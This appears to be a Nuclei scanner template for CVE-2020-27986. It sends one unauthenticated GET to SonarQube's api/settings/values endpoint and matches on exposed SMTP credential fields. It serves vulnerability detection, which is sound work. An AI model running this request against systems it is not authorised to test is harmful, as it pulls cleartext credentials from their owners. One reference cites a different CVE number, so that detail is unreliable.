id: CVE-2020-27986 info: name: SonarQube - Authentication Bypass author: pikpikcu severity: high description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. reference: - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ - https://nvd.nist.gov/vuln/detail/CVE-2020-27866 remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-27986 cwe-id: CWE-306,CWE-312 cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* epss-score: 0.23185 tags: cve,cve2020,sonarqube metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/api/settings/values" matchers-condition: and matchers: - type: word words: - email.smtp_host.secured - email.smtp_password.secured - email.smtp_port.secured - email.smtp_username.secured part: body condition: and - type: status status: - 200 # Enhanced by mp on 2022/07/15